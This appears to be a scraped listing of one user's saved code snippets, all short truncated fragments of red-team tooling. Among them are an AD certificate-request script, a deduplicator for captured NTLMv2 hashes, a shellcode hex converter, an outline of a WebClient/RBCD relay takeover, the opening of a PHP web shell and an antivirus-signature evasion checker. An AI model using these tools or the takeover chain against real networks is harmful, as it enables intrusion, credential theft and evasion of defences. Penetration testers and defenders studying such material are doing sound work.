edermi

#Thank you @NotMedic for troubleshooting/validating stuff!

$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. 
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER

edermi

with open("collected_hashes_ntlmv2.txt", 'r') as hashfile:
    hashes=hashfile.read().splitlines()

hash_dict = {}

for line in hashes:
    name, _ = line.split("::")
    hash_dict[name] = line

with open("uniq_collected_hashes_ntlmv2.txt", 'w') as hashfile:

edermi

import requests
import json
import time
import argparse
import getpass
import os
import sys


def main():

edermi

# Ensure System.Security assembly is loaded.
Add-Type -AssemblyName System.Security

function ConvertTo-CIPolicy {
<#
.SYNOPSIS

Converts a binary file that contains a Code Integrity policy into XML format.

Author: Matthew Graeber (@mattifestation)

edermi

import sys

def main():
    with open(sys.argv[1], 'rb') as f:
        shellcode = f.read()
    hexlified = ['0x{:02X}'.format(b) for b in shellcode]
    with open(sys.argv[2], 'w') as f:
        f.write(','.join(hexlified))
    sys.stderr.write("Shellcode length: {}".format(len(shellcode)))

edermi

using System;
using System.DirectoryServices;

namespace SharpApprover
{
    class Program
    {

        public static void SetAdInfo(string objectFilter,
                int objectValue, string LdapDomain)

edermi

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

• Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
• Relaying that machine authentication to LDAPS for configuring RBCD
• RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

edermi

package main

/*
Example Go program with multiple .NET Binaries embedded

This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
	$ go get -u github.com/gobuffalo/packr/packr

Place all your EXEs are in a "binaries" folder

edermi

<?php

function escapetext($text) {
    return str_replace("\n", "<br>", htmlentities($text));
}

function exec_command($cmd, $internal = false) {
    try {
        $shell_exec = shell_exec($cmd);
    } catch (Exception $e) {

edermi

##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################


import argparse
import enum